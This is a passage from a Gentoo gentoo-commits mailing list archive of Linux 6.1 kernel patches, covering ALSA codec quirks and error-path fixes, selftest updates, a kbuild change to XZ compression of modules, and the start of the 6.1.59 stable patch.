+ 	SND_PCI_QUIRK(0x1043, 0x1683, "ASUS UM3402YAR", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x16b2, "ASUS GU603", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x16e3, "ASUS UX50", ALC269_FIXUP_STEREO_DMIC),
+@@ -10633,6 +10658,8 @@ static const struct snd_hda_pin_quirk alc269_fallback_pin_fixup_tbl[] = {
+ 	SND_HDA_PIN_QUIRK(0x10ec0274, 0x1028, "Dell", ALC274_FIXUP_DELL_AIO_LINEOUT_VERB,
+ 		{0x19, 0x40000000},
+ 		{0x1a, 0x40000000}),
++	SND_HDA_PIN_QUIRK(0x10ec0256, 0x1043, "ASUS", ALC2XX_FIXUP_HEADSET_MIC,
++		{0x19, 0x40000000}),
+ 	{}
+ };
+ 
+diff --git a/sound/soc/codecs/wcd938x-sdw.c b/sound/soc/codecs/wcd938x-sdw.c
+index 9c10200ff34b2..5b5b7c267a616 100644
+--- a/sound/soc/codecs/wcd938x-sdw.c
++++ b/sound/soc/codecs/wcd938x-sdw.c
+@@ -1278,7 +1278,31 @@ static int wcd9380_probe(struct sdw_slave *pdev,
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+ 
+-	return component_add(dev, &wcd938x_sdw_component_ops);
++	ret = component_add(dev, &wcd938x_sdw_component_ops);
++	if (ret)
++		goto err_disable_rpm;
++
++	return 0;
++
++err_disable_rpm:
++	pm_runtime_disable(dev);
++	pm_runtime_set_suspended(dev);
++	pm_runtime_dont_use_autosuspend(dev);
++
++	return ret;
++}
++
++static int wcd9380_remove(struct sdw_slave *pdev)
++{
++	struct device *dev = &pdev->dev;
++
++	component_del(dev, &wcd938x_sdw_component_ops);
++
++	pm_runtime_disable(dev);
++	pm_runtime_set_suspended(dev);
++	pm_runtime_dont_use_autosuspend(dev);
++
++	return 0;
+ }
+ 
+ static const struct sdw_device_id wcd9380_slave_id[] = {
+@@ -1320,6 +1344,7 @@ static const struct dev_pm_ops wcd938x_sdw_pm_ops = {
+ 
+ static struct sdw_driver wcd9380_codec_driver = {
+ 	.probe	= wcd9380_probe,
++	.remove	= wcd9380_remove,
+ 	.ops = &wcd9380_slave_ops,
+ 	.id_table = wcd9380_slave_id,
+ 	.driver = {
+diff --git a/sound/soc/codecs/wcd938x.c b/sound/soc/codecs/wcd938x.c
+index 2316481c2541b..c3964aa00b288 100644
+--- a/sound/soc/codecs/wcd938x.c
++++ b/sound/soc/codecs/wcd938x.c
+@@ -3441,7 +3441,8 @@ static int wcd938x_bind(struct device *dev)
+ 	wcd938x->rxdev = wcd938x_sdw_device_get(wcd938x->rxnode);
+ 	if (!wcd938x->rxdev) {
+ 		dev_err(dev, "could not find slave with matching of node\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto err_unbind;
+ 	}
+ 	wcd938x->sdw_priv[AIF1_PB] = dev_get_drvdata(wcd938x->rxdev);
+ 	wcd938x->sdw_priv[AIF1_PB]->wcd938x = wcd938x;
+@@ -3449,46 +3450,47 @@ static int wcd938x_bind(struct device *dev)
+ 	wcd938x->txdev = wcd938x_sdw_device_get(wcd938x->txnode);
+ 	if (!wcd938x->txdev) {
+ 		dev_err(dev, "could not find txslave with matching of node\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto err_put_rxdev;
+ 	}
+ 	wcd938x->sdw_priv[AIF1_CAP] = dev_get_drvdata(wcd938x->txdev);
+ 	wcd938x->sdw_priv[AIF1_CAP]->wcd938x = wcd938x;
+ 	wcd938x->tx_sdw_dev = dev_to_sdw_dev(wcd938x->txdev);
+-	if (!wcd938x->tx_sdw_dev) {
+-		dev_err(dev, "could not get txslave with matching of dev\n");
+-		return -EINVAL;
+-	}
+ 
+ 	/* As TX is main CSR reg interface, which should not be suspended first.
+ 	 * expicilty add the dependency link */
+ 	if (!device_link_add(wcd938x->rxdev, wcd938x->txdev, DL_FLAG_STATELESS |
+ 			    DL_FLAG_PM_RUNTIME)) {
+ 		dev_err(dev, "could not devlink tx and rx\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto err_put_txdev;
+ 	}
+ 
+ 	if (!device_link_add(dev, wcd938x->txdev, DL_FLAG_STATELESS |
+ 					DL_FLAG_PM_RUNTIME)) {
+ 		dev_err(dev, "could not devlink wcd and tx\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto err_remove_rxtx_link;
+ 	}
+ 
+ 	if (!device_link_add(dev, wcd938x->rxdev, DL_FLAG_STATELESS |
+ 					DL_FLAG_PM_RUNTIME)) {
+ 		dev_err(dev, "could not devlink wcd and rx\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto err_remove_tx_link;
+ 	}
+ 
+ 	wcd938x->regmap = dev_get_regmap(&wcd938x->tx_sdw_dev->dev, NULL);
+ 	if (!wcd938x->regmap) {
+ 		dev_err(dev, "could not get TX device regmap\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto err_remove_rx_link;
+ 	}
+ 
+ 	ret = wcd938x_irq_init(wcd938x, dev);
+ 	if (ret) {
+ 		dev_err(dev, "%s: IRQ init failed: %d\n", __func__, ret);
+-		return ret;
++		goto err_remove_rx_link;
+ 	}
+ 
+ 	wcd938x->sdw_priv[AIF1_PB]->slave_irq = wcd938x->virq;
+@@ -3497,27 +3499,45 @@ static int wcd938x_bind(struct device *dev)
+ 	ret = wcd938x_set_micbias_data(wcd938x);
+ 	if (ret < 0) {
+ 		dev_err(dev, "%s: bad micbias pdata\n", __func__);
+-		return ret;
++		goto err_remove_rx_link;
+ 	}
+ 
+ 	ret = snd_soc_register_component(dev, &soc_codec_dev_wcd938x,
+ 					 wcd938x_dais, ARRAY_SIZE(wcd938x_dais));
+-	if (ret)
++	if (ret) {
+ 		dev_err(dev, "%s: Codec registration failed\n",
+ 				__func__);
++		goto err_remove_rx_link;
++	}
+ 
+-	return ret;
++	return 0;
++
++err_remove_rx_link:
++	device_link_remove(dev, wcd938x->rxdev);
++err_remove_tx_link:
++	device_link_remove(dev, wcd938x->txdev);
++err_remove_rxtx_link:
++	device_link_remove(wcd938x->rxdev, wcd938x->txdev);
++err_put_txdev:
++	put_device(wcd938x->txdev);
++err_put_rxdev:
++	put_device(wcd938x->rxdev);
++err_unbind:
++	component_unbind_all(dev, wcd938x);
+ 
++	return ret;
+ }
+ 
+ static void wcd938x_unbind(struct device *dev)
+ {
+ 	struct wcd938x_priv *wcd938x = dev_get_drvdata(dev);
+ 
++	snd_soc_unregister_component(dev);
+ 	device_link_remove(dev, wcd938x->txdev);
+ 	device_link_remove(dev, wcd938x->rxdev);
+ 	device_link_remove(wcd938x->rxdev, wcd938x->txdev);
+-	snd_soc_unregister_component(dev);
++	put_device(wcd938x->txdev);
++	put_device(wcd938x->rxdev);
+ 	component_unbind_all(dev, wcd938x);
+ }
+ 
+diff --git a/sound/soc/pxa/pxa-ssp.c b/sound/soc/pxa/pxa-ssp.c
+index 430dd446321e5..452f0caf415b9 100644
+--- a/sound/soc/pxa/pxa-ssp.c
++++ b/sound/soc/pxa/pxa-ssp.c
+@@ -779,7 +779,7 @@ static int pxa_ssp_probe(struct snd_soc_dai *dai)
+ 		if (IS_ERR(priv->extclk)) {
+ 			ret = PTR_ERR(priv->extclk);
+ 			if (ret == -EPROBE_DEFER)
+-				return ret;
++				goto err_priv;
+ 
+ 			priv->extclk = NULL;
+ 		}
+diff --git a/tools/testing/selftests/ftrace/test.d/kprobe/kprobe_non_uniq_symbol.tc b/tools/testing/selftests/ftrace/test.d/kprobe/kprobe_non_uniq_symbol.tc
+new file mode 100644
+index 0000000000000..bc9514428dbaf
+--- /dev/null
++++ b/tools/testing/selftests/ftrace/test.d/kprobe/kprobe_non_uniq_symbol.tc
+@@ -0,0 +1,13 @@
++#!/bin/sh
++# SPDX-License-Identifier: GPL-2.0
++# description: Test failure of registering kprobe on non unique symbol
++# requires: kprobe_events
++
++SYMBOL='name_show'
++
++# We skip this test on kernel where SYMBOL is unique or does not exist.
++if [ "$(grep -c -E "[[:alnum:]]+ t ${SYMBOL}" /proc/kallsyms)" -le '1' ]; then
++	exit_unsupported
++fi
++
++! echo "p:test_non_unique ${SYMBOL}" > kprobe_events
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index 7b20878a1af59..ea6fc59e9f62f 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -1413,7 +1413,9 @@ chk_rst_nr()
+ 	count=$(get_counter ${ns_tx} "MPTcpExtMPRstTx")
+ 	if [ -z "$count" ]; then
+ 		echo -n "[skip]"
+-	elif [ $count -lt $rst_tx ]; then
++	# accept more rst than expected except if we don't expect any
++	elif { [ $rst_tx -ne 0 ] && [ $count -lt $rst_tx ]; } ||
++	     { [ $rst_tx -eq 0 ] && [ $count -ne 0 ]; }; then
+ 		echo "[fail] got $count MP_RST[s] TX expected $rst_tx"
+ 		fail_test
+ 		dump_stats=1
+@@ -1425,7 +1427,9 @@ chk_rst_nr()
+ 	count=$(get_counter ${ns_rx} "MPTcpExtMPRstRx")
+ 	if [ -z "$count" ]; then
+ 		echo -n "[skip]"
+-	elif [ "$count" -lt "$rst_rx" ]; then
++	# accept more rst than expected except if we don't expect any
++	elif { [ $rst_rx -ne 0 ] && [ $count -lt $rst_rx ]; } ||
++	     { [ $rst_rx -eq 0 ] && [ $count -ne 0 ]; }; then
+ 		echo "[fail] got $count MP_RST[s] RX expected $rst_rx"
+ 		fail_test
+ 		dump_stats=1
+@@ -2259,6 +2263,7 @@ remove_tests()
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 -1 slow
+ 		chk_join_nr 1 1 1
+ 		chk_rm_nr 1 1
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# multiple subflows, remove
+@@ -2270,6 +2275,7 @@ remove_tests()
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 -2 slow
+ 		chk_join_nr 2 2 2
+ 		chk_rm_nr 2 2
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# single address, remove
+@@ -2281,6 +2287,7 @@ remove_tests()
+ 		chk_join_nr 1 1 1
+ 		chk_add_nr 1 1
+ 		chk_rm_nr 1 1 invert
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# subflow and signal, remove
+@@ -2293,6 +2300,7 @@ remove_tests()
+ 		chk_join_nr 2 2 2
+ 		chk_add_nr 1 1
+ 		chk_rm_nr 1 1
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# subflows and signal, remove
+@@ -2306,6 +2314,7 @@ remove_tests()
+ 		chk_join_nr 3 3 3
+ 		chk_add_nr 1 1
+ 		chk_rm_nr 2 2
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# addresses remove
+@@ -2319,6 +2328,7 @@ remove_tests()
+ 		chk_join_nr 3 3 3
+ 		chk_add_nr 3 3
+ 		chk_rm_nr 3 3 invert
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# invalid addresses remove
+@@ -2332,6 +2342,7 @@ remove_tests()
+ 		chk_join_nr 1 1 1
+ 		chk_add_nr 3 3
+ 		chk_rm_nr 3 1 invert
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# subflows and signal, flush
+@@ -2345,6 +2356,7 @@ remove_tests()
+ 		chk_join_nr 3 3 3
+ 		chk_add_nr 1 1
+ 		chk_rm_nr 1 3 invert simult
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# subflows flush
+@@ -2362,6 +2374,7 @@ remove_tests()
+ 		else
+ 			chk_rm_nr 3 3
+ 		fi
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# addresses flush
+@@ -2375,6 +2388,7 @@ remove_tests()
+ 		chk_join_nr 3 3 3
+ 		chk_add_nr 3 3
+ 		chk_rm_nr 3 3 invert simult
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# invalid addresses flush
+@@ -2388,6 +2402,7 @@ remove_tests()
+ 		chk_join_nr 1 1 1
+ 		chk_add_nr 3 3
+ 		chk_rm_nr 3 1 invert
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# remove id 0 subflow
+@@ -2398,6 +2413,7 @@ remove_tests()
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 -9 slow
+ 		chk_join_nr 1 1 1
+ 		chk_rm_nr 1 1
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# remove id 0 address
+@@ -2409,6 +2425,7 @@ remove_tests()
+ 		chk_join_nr 1 1 1
+ 		chk_add_nr 1 1
+ 		chk_rm_nr 1 1 invert
++		chk_rst_nr 0 0 invert
+ 	fi
+ }
+ 
+diff --git a/tools/testing/selftests/net/openvswitch/openvswitch.sh b/tools/testing/selftests/net/openvswitch/openvswitch.sh
+index 7ce46700a3ae3..52054a09d575c 100755
+--- a/tools/testing/selftests/net/openvswitch/openvswitch.sh
++++ b/tools/testing/selftests/net/openvswitch/openvswitch.sh
+@@ -3,6 +3,8 @@
+ #
+ # OVS kernel module self tests
+ 
++trap ovs_exit_sig EXIT TERM INT ERR
++
+ # Kselftest framework requirement - SKIP code is 4.
+ ksft_skip=4
+ 
+@@ -115,7 +117,7 @@ run_test() {
+ 	fi
+ 
+ 	if python3 ovs-dpctl.py -h 2>&1 | \
+-	     grep "Need to install the python" >/dev/null 2>&1; then
++	     grep -E "Need to (install|upgrade) the python" >/dev/null 2>&1; then
+ 		stdbuf -o0 printf "TEST: %-60s  [PYLIB]\n" "${tdesc}"
+ 		return $ksft_skip
+ 	fi
+diff --git a/tools/testing/selftests/net/openvswitch/ovs-dpctl.py b/tools/testing/selftests/net/openvswitch/ovs-dpctl.py
+index 5d467d1993cb1..e787a1f967b0d 100644
+--- a/tools/testing/selftests/net/openvswitch/ovs-dpctl.py
++++ b/tools/testing/selftests/net/openvswitch/ovs-dpctl.py
+@@ -17,8 +17,10 @@ try:
+     from pyroute2.netlink import nla
+     from pyroute2.netlink.exceptions import NetlinkError
+     from pyroute2.netlink.generic import GenericNetlinkSocket
++    import pyroute2
++
+ except ModuleNotFoundError:
+-    print("Need to install the python pyroute2 package.")
++    print("Need to install the python pyroute2 package >= 0.6.")
+     sys.exit(0)
+ 
+ 
+@@ -280,6 +282,12 @@ def print_ovsdp_full(dp_lookup_rep, ifindex, ndb=NDB()):
+ 
+ 
+ def main(argv):
++    # version check for pyroute2
++    prverscheck = pyroute2.__version__.split(".")
++    if int(prverscheck[0]) == 0 and int(prverscheck[1]) < 6:
++        print("Need to upgrade the python pyroute2 package to >= 0.6.")
++        sys.exit(0)
++
+     parser = argparse.ArgumentParser()
+     parser.add_argument(
+         "-v",
+diff --git a/tools/testing/selftests/netfilter/nft_audit.sh b/tools/testing/selftests/netfilter/nft_audit.sh
+index bb34329e02a7f..5267c88496d51 100755
+--- a/tools/testing/selftests/netfilter/nft_audit.sh
++++ b/tools/testing/selftests/netfilter/nft_audit.sh
+@@ -11,6 +11,12 @@ nft --version >/dev/null 2>&1 || {
+ 	exit $SKIP_RC
+ }
+ 
++# Run everything in a separate network namespace
++[ "${1}" != "run" ] && { unshare -n "${0}" run; exit $?; }
++
++# give other scripts a chance to finish - audit_logread sees all activity
++sleep 1
++
+ logfile=$(mktemp)
+ rulefile=$(mktemp)
+ echo "logging into $logfile"
+diff --git a/tools/testing/selftests/vm/charge_reserved_hugetlb.sh b/tools/testing/selftests/vm/charge_reserved_hugetlb.sh
+index a5cb4b09a46c4..0899019a7fcb4 100644
+--- a/tools/testing/selftests/vm/charge_reserved_hugetlb.sh
++++ b/tools/testing/selftests/vm/charge_reserved_hugetlb.sh
+@@ -25,7 +25,7 @@ if [[ "$1" == "-cgroup-v2" ]]; then
+ fi
+ 
+ if [[ $cgroup2 ]]; then
+-  cgroup_path=$(mount -t cgroup2 | head -1 | awk -e '{print $3}')
++  cgroup_path=$(mount -t cgroup2 | head -1 | awk '{print $3}')
+   if [[ -z "$cgroup_path" ]]; then
+     cgroup_path=/dev/cgroup/memory
+     mount -t cgroup2 none $cgroup_path
+@@ -33,7 +33,7 @@ if [[ $cgroup2 ]]; then
+   fi
+   echo "+hugetlb" >$cgroup_path/cgroup.subtree_control
+ else
+-  cgroup_path=$(mount -t cgroup | grep ",hugetlb" | awk -e '{print $3}')
++  cgroup_path=$(mount -t cgroup | grep ",hugetlb" | awk '{print $3}')
+   if [[ -z "$cgroup_path" ]]; then
+     cgroup_path=/dev/cgroup/memory
+     mount -t cgroup memory,hugetlb $cgroup_path
+diff --git a/tools/testing/selftests/vm/hugetlb_reparenting_test.sh b/tools/testing/selftests/vm/hugetlb_reparenting_test.sh
+index bf2d2a684edfd..14d26075c8635 100644
+--- a/tools/testing/selftests/vm/hugetlb_reparenting_test.sh
++++ b/tools/testing/selftests/vm/hugetlb_reparenting_test.sh
+@@ -20,7 +20,7 @@ fi
+ 
+ 
+ if [[ $cgroup2 ]]; then
+-  CGROUP_ROOT=$(mount -t cgroup2 | head -1 | awk -e '{print $3}')
++  CGROUP_ROOT=$(mount -t cgroup2 | head -1 | awk '{print $3}')
+   if [[ -z "$CGROUP_ROOT" ]]; then
+     CGROUP_ROOT=/dev/cgroup/memory
+     mount -t cgroup2 none $CGROUP_ROOT
+@@ -28,7 +28,7 @@ if [[ $cgroup2 ]]; then
+   fi
+   echo "+hugetlb +memory" >$CGROUP_ROOT/cgroup.subtree_control
+ else
+-  CGROUP_ROOT=$(mount -t cgroup | grep ",hugetlb" | awk -e '{print $3}')
++  CGROUP_ROOT=$(mount -t cgroup | grep ",hugetlb" | awk '{print $3}')
+   if [[ -z "$CGROUP_ROOT" ]]; then
+     CGROUP_ROOT=/dev/cgroup/memory
+     mount -t cgroup memory,hugetlb $CGROUP_ROOT


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-10-22 22:53 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-10-22 22:53 UTC (permalink / raw
  To: gentoo-commits

commit:     1b5d19742dd710541a3d5f47e0e9d4aafa829ef7
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Oct 22 22:52:32 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Oct 22 22:52:32 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=1b5d1974

kbuild: Use CRC32 and a 1MiB dictionary for XZ compressed modules

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                 |  4 +++
 2950_kbuild-CRC32-1MB-dict-xz-modules.patch | 38 +++++++++++++++++++++++++++++
 2 files changed, 42 insertions(+)

diff --git a/0000_README b/0000_README
index 455e85da..2db06d5c 100644
--- a/0000_README
+++ b/0000_README
@@ -315,6 +315,10 @@ Patch:  2940_handle-gcc-14-last-stmt-rename.patch
 From:   https://lore.kernel.org/all/20230811060545.never.564-kees@kernel.org/#Z31scripts:gcc-plugins:gcc-common.h
 Desc:   gcc-plugins: Rename last_stmt() for GCC 14+
 
+Patch:  2950_kbuild-CRC32-1MB-dict-xz-modules.patch
+From:   https://git.kernel.org/pub/scm/linux/kernel/git/masahiroy/linux-kbuild.git/commit/?h=kbuild&id=fbf5892df21a8ccfcb2fda0fd65bc3169c89ed28
+Desc:   kbuild: Use CRC32 and a 1MiB dictionary for XZ compressed modules
+
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2950_kbuild-CRC32-1MB-dict-xz-modules.patch b/2950_kbuild-CRC32-1MB-dict-xz-modules.patch
new file mode 100644
index 00000000..32090343
--- /dev/null
+++ b/2950_kbuild-CRC32-1MB-dict-xz-modules.patch
@@ -0,0 +1,38 @@
+From fbf5892df21a8ccfcb2fda0fd65bc3169c89ed28 Mon Sep 17 00:00:00 2001
+From: Martin Nybo Andersen <tweek@tweek.dk>
+Date: Fri, 15 Sep 2023 12:15:39 +0200
+Subject: kbuild: Use CRC32 and a 1MiB dictionary for XZ compressed modules
+
+Kmod is now (since kmod commit 09c9f8c5df04 ("libkmod: Use kernel
+decompression when available")) using the kernel decompressor, when
+loading compressed modules.
+
+However, the kernel XZ decompressor is XZ Embedded, which doesn't
+handle CRC64 and dictionaries larger than 1MiB.
+
+Use CRC32 and 1MiB dictionary when XZ compressing and installing
+kernel modules.
+
+Link: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1050582
+Signed-off-by: Martin Nybo Andersen <tweek@tweek.dk>
+Signed-off-by: Masahiro Yamada <masahiroy@kernel.org>
+---
+ scripts/Makefile.modinst | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/scripts/Makefile.modinst b/scripts/Makefile.modinst
+index 346f5ec506823..0afd75472679f 100644
+--- a/scripts/Makefile.modinst
++++ b/scripts/Makefile.modinst
+@@ -144,7 +144,7 @@ endif
+ quiet_cmd_gzip = GZIP    $@
+       cmd_gzip = $(KGZIP) -n -f $<
+ quiet_cmd_xz = XZ      $@
+-      cmd_xz = $(XZ) --lzma2=dict=2MiB -f $<
++      cmd_xz = $(XZ) --check=crc32 --lzma2=dict=1MiB -f $<
+ quiet_cmd_zstd = ZSTD    $@
+       cmd_zstd = $(ZSTD) -T0 --rm -f -q $<
+ 
+-- 
+cgit 
+


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-10-19 22:30 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-10-19 22:30 UTC (permalink / raw
  To: gentoo-commits

commit:     37b40057a74e9cab83bcd5c894920f0251d64c17
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Oct 19 22:25:18 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Oct 19 22:25:18 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=37b40057

Linux patch 6.1.59

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1058_linux-6.1.59.patch | 4902 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 4906 insertions(+)

diff --git a/0000_README b/0000_README
index 1d0e038f..455e85da 100644
--- a/0000_README
+++ b/0000_README
@@ -275,6 +275,10 @@ Patch:  1057_linux-6.1.58.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.58
 
+Patch:  1058_linux-6.1.59.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.59
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1058_linux-6.1.59.patch b/1058_linux-6.1.59.patch
new file mode 100644
index 00000000..5d22b412
--- /dev/null
+++ b/1058_linux-6.1.59.patch
@@ -0,0 +1,4902 @@
+diff --git a/Documentation/devicetree/bindings/interrupt-controller/renesas,rzg2l-irqc.yaml b/Documentation/devicetree/bindings/interrupt-controller/renesas,rzg2l-irqc.yaml
+index 33b90e975e33c..ea7db3618b23e 100644
+--- a/Documentation/devicetree/bindings/interrupt-controller/renesas,rzg2l-irqc.yaml
++++ b/Documentation/devicetree/bindings/interrupt-controller/renesas,rzg2l-irqc.yaml
+@@ -31,8 +31,9 @@ properties:
+       - const: renesas,rzg2l-irqc
+ 
+   '#interrupt-cells':
+-    description: The first cell should contain external interrupt number (IRQ0-7) and the
+-                 second cell is used to specify the flag.
++    description: The first cell should contain a macro RZG2L_{NMI,IRQX} included in the
++                 include/dt-bindings/interrupt-controller/irqc-rzg2l.h and the second
++                 cell is used to specify the flag.
+     const: 2
+ 
+   '#address-cells':
+diff --git a/Documentation/networking/ip-sysctl.rst b/Documentation/networking/ip-sysctl.rst
+index f5f7a464605f9..b47b3d0ce5596 100644
+--- a/Documentation/networking/ip-sysctl.rst
++++ b/Documentation/networking/ip-sysctl.rst
+@@ -967,6 +967,21 @@ tcp_tw_reuse - INTEGER
+ tcp_window_scaling - BOOLEAN
+ 	Enable window scaling as defined in RFC1323.
+ 
++tcp_shrink_window - BOOLEAN
++	This changes how the TCP receive window is calculated.
++
++	RFC 7323, section 2.4, says there are instances when a retracted
++	window can be offered, and that TCP implementations MUST ensure
++	that they handle a shrinking window, as specified in RFC 1122.
++
++	- 0 - Disabled.	The window is never shrunk.
++	- 1 - Enabled.	The window is shrunk when necessary to remain within
++			the memory limit set by autotuning (sk_rcvbuf).
++			This only occurs if a non-zero receive window
++			scaling factor is also in effect.
++
++	Default: 0
++
+ tcp_wmem - vector of 3 INTEGERs: min, default, max
+ 	min: Amount of memory reserved for send buffers for TCP sockets.
+ 	Each TCP socket has rights to use it due to fact of its birth.
+diff --git a/Makefile b/Makefile
+index ce1eec0b5010d..4ad29c852e5f8 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 58
++SUBLEVEL = 59
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195-demo.dts b/arch/arm64/boot/dts/mediatek/mt8195-demo.dts
+index dec85d2548384..5117b2e7985af 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195-demo.dts
++++ b/arch/arm64/boot/dts/mediatek/mt8195-demo.dts
+@@ -48,7 +48,7 @@
+ 
+ 	memory@40000000 {
+ 		device_type = "memory";
+-		reg = <0 0x40000000 0 0x80000000>;
++		reg = <0 0x40000000 0x2 0x00000000>;
+ 	};
+ 
+ 	reserved-memory {
+@@ -56,13 +56,8 @@
+ 		#size-cells = <2>;
+ 		ranges;
+ 
+-		/* 2 MiB reserved for ARM Trusted Firmware (BL31) */
+-		bl31_secmon_reserved: secmon@54600000 {
+-			no-map;
+-			reg = <0 0x54600000 0x0 0x200000>;
+-		};
+-
+-		/* 12 MiB reserved for OP-TEE (BL32)
++		/*
++		 * 12 MiB reserved for OP-TEE (BL32)
+ 		 * +-----------------------+ 0x43e0_0000
+ 		 * |      SHMEM 2MiB       |
+ 		 * +-----------------------+ 0x43c0_0000
+@@ -75,6 +70,34 @@
+ 			no-map;
+ 			reg = <0 0x43200000 0 0x00c00000>;
+ 		};
++
++		scp_mem: memory@50000000 {
++			compatible = "shared-dma-pool";
++			reg = <0 0x50000000 0 0x2900000>;
++			no-map;
++		};
++
++		vpu_mem: memory@53000000 {
++			compatible = "shared-dma-pool";
++			reg = <0 0x53000000 0 0x1400000>; /* 20 MB */
++		};
++
++		/* 2 MiB reserved for ARM Trusted Firmware (BL31) */
++		bl31_secmon_mem: memory@54600000 {
++			no-map;
++			reg = <0 0x54600000 0x0 0x200000>;
++		};
++
++		snd_dma_mem: memory@60000000 {
++			compatible = "shared-dma-pool";
++			reg = <0 0x60000000 0 0x1100000>;
++			no-map;
++		};
++
++		apu_mem: memory@62000000 {
++			compatible = "shared-dma-pool";
++			reg = <0 0x62000000 0 0x1400000>; /* 20 MB */
++		};
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195.dtsi b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+index 2c2b946b614bf..ef2764a595eda 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+@@ -229,6 +229,7 @@
+ 		interrupts = <GIC_SPI 18 IRQ_TYPE_LEVEL_HIGH 0>;
+ 		cpus = <&cpu0>, <&cpu1>, <&cpu2>, <&cpu3>,
+ 		       <&cpu4>, <&cpu5>, <&cpu6>, <&cpu7>;
++		status = "fail";
+ 	};
+ 
+ 	dmic_codec: dmic-codec {
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index f049fb42e3ca8..de794a5078dfc 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -3701,7 +3701,7 @@
+ 
+ 		pdc: interrupt-controller@b220000 {
+ 			compatible = "qcom,sm8150-pdc", "qcom,pdc";
+-			reg = <0 0x0b220000 0 0x400>;
++			reg = <0 0x0b220000 0 0x30000>;
+ 			qcom,pdc-ranges = <0 480 94>, <94 609 31>,
+ 					  <125 63 1>;
+ 			#interrupt-cells = <2>;
+diff --git a/arch/powerpc/include/asm/nohash/32/pte-8xx.h b/arch/powerpc/include/asm/nohash/32/pte-8xx.h
+index 1a89ebdc3acc9..0238e6bd0d6c1 100644
+--- a/arch/powerpc/include/asm/nohash/32/pte-8xx.h
++++ b/arch/powerpc/include/asm/nohash/32/pte-8xx.h
+@@ -94,6 +94,13 @@ static inline pte_t pte_wrprotect(pte_t pte)
+ 
+ #define pte_wrprotect pte_wrprotect
+ 
++static inline int pte_read(pte_t pte)
++{
++	return (pte_val(pte) & _PAGE_RO) != _PAGE_NA;
++}
++
++#define pte_read pte_read
++
+ static inline int pte_write(pte_t pte)
+ {
+ 	return !(pte_val(pte) & _PAGE_RO);
+diff --git a/arch/powerpc/include/asm/nohash/64/pgtable.h b/arch/powerpc/include/asm/nohash/64/pgtable.h
+index 879e9a6e5a870..00a003d367523 100644
+--- a/arch/powerpc/include/asm/nohash/64/pgtable.h
